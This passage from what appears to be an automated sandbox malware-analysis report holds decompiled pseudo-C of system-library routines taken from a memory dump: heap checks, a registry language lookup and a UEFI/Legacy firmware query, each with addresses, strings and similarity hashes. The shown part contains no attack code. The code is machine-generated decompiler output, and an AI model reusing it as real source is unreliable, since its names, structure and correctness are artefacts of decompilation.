								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                          0x010ae620
                                          0x010ae628
                                          0x010ae62f
                                          0x010ae631
                                          0x010ae635
                                          0x010ae637
                                          0x010ae63e
                                          0x01105503
                                          0x01105503
                                          0x010ae64c
                                          0x010ae64c
                                          0x010ae651
                                          0x00000000
                                          0x00000000
                                          0x010ae661
                                          0x010ae665
                                          0x0110542a
                                          0x010ae715
                                          0x010ae71a
                                          0x010ae71c
                                          0x010ae720
                                          0x010ae720
                                          0x010ae727
                                          0x010ae736
                                          0x010ae736
                                          0x010ae743
                                          0x010ae743
                                          0x010ae673
                                          0x010ae678
                                          0x010ae67d
                                          0x010ae682
                                          0x010ae685
                                          0x010ae692
                                          0x010ae69b
                                          0x010ae6a3
                                          0x010ae6ad
                                          0x010ae6b1
                                          0x010ae6b2
                                          0x010ae6bb
                                          0x010ae6bf
                                          0x010ae6c0
                                          0x010ae6c8
                                          0x010ae6cc
                                          0x010ae6d5
                                          0x010ae6d9
                                          0x00000000
                                          0x00000000
                                          0x010ae6e5
                                          0x010ae6ea
                                          0x010ae6f9
                                          0x010ae70b
                                          0x010ae70f
                                          0x01105439
                                          0x0110545e
                                          0x0110545e
                                          0x00000000
                                          0x0110545e
                                          0x0110543b
                                          0x0110543e
                                          0x01105440
                                          0x01105445
                                          0x01105472
                                          0x01105475
                                          0x0110548d
                                          0x01105493
                                          0x011054a9
                                          0x00000000
                                          0x00000000
                                          0x011054ab
                                          0x011054b4
                                          0x011054bc
                                          0x011054c8
                                          0x011054de
                                          0x011054fb
                                          0x011054e0
                                          0x011054e6
                                          0x011054eb
                                          0x011054eb
                                          0x011054de
                                          0x00000000
                                          0x011054bc
                                          0x01105477
                                          0x0110547a
                                          0x01105480
                                          0x01105483
                                          0x01105486
                                          0x0110548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0110548b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01105447
                                          0x01105447
                                          0x01105447
                                          0x01105447
                                          0x0110544e
                                          0x00000000
                                          0x00000000
                                          0x01105450
                                          0x01105452
                                          0x01105455
                                          0x0110545a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0110545c
                                          0x0110546a
                                          0x0110546d
                                          0x0110546f
                                          0x00000000
                                          0x0110546f
                                          0x010ae70f

                                          Strings
                                          • @, xrefs: 010AE6C0
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010AE68C
                                          • InstallLanguageFallback, xrefs: 010AE6DB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: d6354d54cf287c869252f691c2a19aec42add280ce23ab2844e07425d4545266
                                          • Instruction ID: 368723e978dc3db12a3eb81302c6dafa93033bca77cac88073602b60ccb67df4
                                          • Opcode Fuzzy Hash: d6354d54cf287c869252f691c2a19aec42add280ce23ab2844e07425d4545266
                                          • Instruction Fuzzy Hash: EE51E4729083069BD715EF68C444AAFB7E9BF88614F45092EF9C5D7290F770DA04CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CB8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E010CB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x1198748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E010AB150();
						} else {
							E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E010AB150();
						__eflags =  *0x1197bc8;
						if(__eflags == 0) {
							E01162073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E010CAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                          0x010cb8f0
                                          0x010cb8f2
                                          0x010cb8f4
                                          0x01112c4e
                                          0x01112c50
                                          0x01112c56
                                          0x01112c5c
                                          0x01112c60
                                          0x01112c7f
                                          0x01112c84
                                          0x01112c62
                                          0x01112c77
                                          0x01112c7c
                                          0x01112c8a
                                          0x01112c8f
                                          0x01112c94
                                          0x01112c9c
                                          0x01112ca5
                                          0x01112ca5
                                          0x01112c9c
                                          0x01112c50
                                          0x010cb8fa
                                          0x010cb902
                                          0x010cb921
                                          0x010cb921
                                          0x010cb924
                                          0x010cb924
                                          0x010cb927
                                          0x00000000
                                          0x00000000
                                          0x010cb929
                                          0x010cb92b
                                          0x010cb92d
                                          0x010cb940
                                          0x00000000
                                          0x010cb940
                                          0x010cb932
                                          0x010cb932
                                          0x00000000
                                          0x010cb932
                                          0x00000000
                                          0x010cb904
                                          0x010cb904
                                          0x010cb90a
                                          0x010cb90c
                                          0x010cb916
                                          0x010cb919
                                          0x010cb915
                                          0x010cb915
                                          0x010cb91b
                                          0x010cb91b
                                          0x00000000
                                          0x010cb910

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: d5595debe93cf81700c207f5f60196592dff77cde8be790837939bed590660fe
                                          • Instruction ID: 5c7507da453e9310e340d1f9285f1615ea824d26f863a51309cf527098ca57e8
                                          • Opcode Fuzzy Hash: d5595debe93cf81700c207f5f60196592dff77cde8be790837939bed590660fe
                                          • Instruction Fuzzy Hash: FB11B1313045029FD76D975DC486BBEB7A5EB40A60F25816DE0C6CB245DB30D884CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E0116E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0116BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0116BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0116AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E010E9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0116A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0116A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E010E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0116A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0116A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E010C2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E010BB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E010BFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E010C7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0115FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                          0x0116e547
                                          0x0116e549
                                          0x0116e54f
                                          0x0116e553
                                          0x0116e557
                                          0x0116e55a
                                          0x0116e55c
                                          0x0116e55f
                                          0x0116e561
                                          0x0116e567
                                          0x0116e56b
                                          0x0116e7e2
                                          0x00000000
                                          0x0116e571
                                          0x0116e575
                                          0x0116e577
                                          0x0116e57b
                                          0x0116e57c
                                          0x0116e57d
                                          0x0116e57e
                                          0x0116e57f
                                          0x0116e588
                                          0x0116e58f
                                          0x0116e591
                                          0x0116e592
                                          0x0116e592
                                          0x0116e596
                                          0x0116e59e
                                          0x0116e5a0
                                          0x0116e5a6
                                          0x0116e61d
                                          0x0116e61d
                                          0x0116e621
                                          0x0116e623
                                          0x0116e630
                                          0x0116e630
                                          0x0116e7e6
                                          0x0116e7eb
                                          0x0116e7ed
                                          0x0116e7f4
                                          0x0116e7fa
                                          0x0116e7ff
                                          0x0116e7ff
                                          0x0116e80a
                                          0x0116e812
                                          0x0116e812
                                          0x0116e5ab
                                          0x0116e5b4
                                          0x0116e5b9
                                          0x0116e5be
                                          0x0116e5c0
                                          0x0116e5c2
                                          0x0116e5c8
                                          0x0116e5c9
                                          0x0116e5cb
                                          0x0116e5cc
                                          0x0116e5d5
                                          0x0116e5e4
                                          0x0116e5f1
                                          0x0116e5f8
                                          0x0116e5f8
                                          0x0116e5d5
                                          0x0116e602
                                          0x0116e616
                                          0x0116e63d
                                          0x0116e644
                                          0x0116e64d
                                          0x0116e652
                                          0x0116e657
                                          0x0116e659
                                          0x0116e65b
                                          0x0116e661
                                          0x0116e662
                                          0x0116e664
                                          0x0116e665
                                          0x0116e66e
                                          0x0116e67d
                                          0x0116e68a
                                          0x0116e691
                                          0x0116e691
                                          0x0116e66e
                                          0x0116e6b0
                                          0x00000000
                                          0x0116e6b6
                                          0x0116e6bd
                                          0x0116e6c7
                                          0x0116e6d7
                                          0x0116e6d9
                                          0x0116e6db
                                          0x0116e6de
                                          0x0116e6e3
                                          0x0116e6f3
                                          0x0116e6fc
                                          0x0116e700
                                          0x0116e700
                                          0x0116e704
                                          0x0116e70a
                                          0x0116e70a
                                          0x0116e713
                                          0x0116e716
                                          0x0116e719
                                          0x0116e720
                                          0x0116e761
                                          0x0116e76b
                                          0x0116e774
                                          0x0116e77a
                                          0x0116e77a
                                          0x0116e78a
                                          0x0116e791
                                          0x0116e799
                                          0x0116e79b
                                          0x0116e79f
                                          0x0116e7aa
                                          0x0116e7c0
                                          0x0116e7ac
                                          0x0116e7b2
                                          0x0116e7b9
                                          0x0116e7b9
                                          0x0116e7c7
                                          0x0116e806
                                          0x00000000
                                          0x0116e7c9
                                          0x0116e7d1
                                          0x0116e7d8
                                          0x00000000
                                          0x0116e7d8
                                          0x00000000
                                          0x00000000
                                          0x0116e722
                                          0x0116e72e
                                          0x0116e748
                                          0x0116e74c
                                          0x0116e754
                                          0x0116e756
                                          0x0116e75c
                                          0x0116e75c
                                          0x00000000
                                          0x0116e75c
                                          0x0116e758
                                          0x0116e758
                                          0x00000000
                                          0x0116e758
                                          0x0116e750
                                          0x00000000
                                          0x00000000
                                          0x0116e752
                                          0x00000000
                                          0x0116e752
                                          0x0116e730
                                          0x0116e735
                                          0x0116e73d
                                          0x0116e73f
                                          0x00000000
                                          0x00000000
                                          0x0116e741
                                          0x0116e741
                                          0x00000000
                                          0x0116e741
                                          0x0116e739
                                          0x00000000
                                          0x00000000
                                          0x0116e73b
                                          0x00000000
                                          0x0116e73b
                                          0x0116e722
                                          0x0116e720
                                          0x0116e6b0
                                          0x0116e618
                                          0x00000000
                                          0x0116e618

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction ID: 11f3c0f725146669a3bdb77ad25561f8a50cfc7886d8b810be4e3bcffae2b4e3
                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction Fuzzy Hash: 7191B5352057429FE728CF29C840B57BBE9BF84714F148A2DF695CB280E776E914CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011251BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E011251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x11805f0);
				E010FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E011253CA(0);
						return E010FD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E010EF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E010C3690(1, _t117, 0x1081810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E010EAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L010C4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E010EAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0112500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E010E9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                          0x011251be
                                          0x011251c3
                                          0x011251c8
                                          0x011251cd
                                          0x011251d0
                                          0x011251d3
                                          0x011251d8
                                          0x011251db
                                          0x011251de
                                          0x011251e0
                                          0x011251e3
                                          0x011251e6
                                          0x011251e8
                                          0x01125342
                                          0x01125351
                                          0x01125356
                                          0x0112535a
                                          0x01125360
                                          0x01125363
                                          0x01125366
                                          0x01125369
                                          0x01125369
                                          0x0112536b
                                          0x0112536b
                                          0x01125370
                                          0x011253a3
                                          0x011253a4
                                          0x011253a6
                                          0x011253ab
                                          0x011253ab
                                          0x011253ae
                                          0x011253ae
                                          0x011253b5
                                          0x011253bf
                                          0x011253bf
                                          0x01125375
                                          0x01125396
                                          0x011253a0
                                          0x011253a0
                                          0x00000000
                                          0x01125396
                                          0x01125377
                                          0x01125379
                                          0x0112537f
                                          0x0112538c
                                          0x01125390
                                          0x00000000
                                          0x01125390
                                          0x011251ee
                                          0x011251f1
                                          0x01125301
                                          0x01125310
                                          0x01125315
                                          0x01125318
                                          0x0112531b
                                          0x01125320
                                          0x0112532e
                                          0x01125331
                                          0x00000000
                                          0x01125331
                                          0x01125328
                                          0x01125329
                                          0x00000000
                                          0x01125329
                                          0x011251fa
                                          0x01125235
                                          0x01125236
                                          0x01125239
                                          0x0112523f
                                          0x01125240
                                          0x01125241
                                          0x01125242
                                          0x01125246
                                          0x01125247
                                          0x0112524e
                                          0x01125251
                                          0x01125267
                                          0x01125269
                                          0x0112526e
                                          0x0112527d
                                          0x0112527e
                                          0x01125281
                                          0x01125282
                                          0x01125287
                                          0x01125288
                                          0x0112528a
                                          0x0112528f
                                          0x01125294
                                          0x00000000
                                          0x00000000
                                          0x0112529a
                                          0x0112529c
                                          0x0112529e
                                          0x0112529e
                                          0x011252a4
                                          0x011252b0
                                          0x00000000
                                          0x00000000
                                          0x011252ba
                                          0x011252bc
                                          0x011252bc
                                          0x011252d4
                                          0x011252d9
                                          0x011252dc
                                          0x011252e1
                                          0x00000000
                                          0x00000000
                                          0x011252e7
                                          0x011252f4
                                          0x00000000
                                          0x011252f4
                                          0x01125270
                                          0x00000000
                                          0x01125270
                                          0x011251fc
                                          0x011251fd
                                          0x01125202
                                          0x01125203
                                          0x01125205
                                          0x0112520a
                                          0x0112520f
                                          0x00000000
                                          0x00000000
                                          0x0112521b
                                          0x01125226
                                          0x0112522b
                                          0x0112521d
                                          0x0112521d
                                          0x01125222
                                          0x01125222
                                          0x0112522d
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 37688f5ad20ae68ee66517b091e61055f6099c30095ec38ba4f269c15695453c
                                          • Instruction ID: 028c084db3fd36c9c2576b42328bcd7e59571040af47e51c7325ddaab95865cb
                                          • Opcode Fuzzy Hash: 37688f5ad20ae68ee66517b091e61055f6099c30095ec38ba4f269c15695453c
                                          • Instruction Fuzzy Hash: DE517B71E04619DFDB68DFA8C980AEEBBF9BB48700F14402DE689EB291D7709910CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E010CB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x119d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E010C7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01178CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E010E9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E010EB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E010ECE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E010C7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01178F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
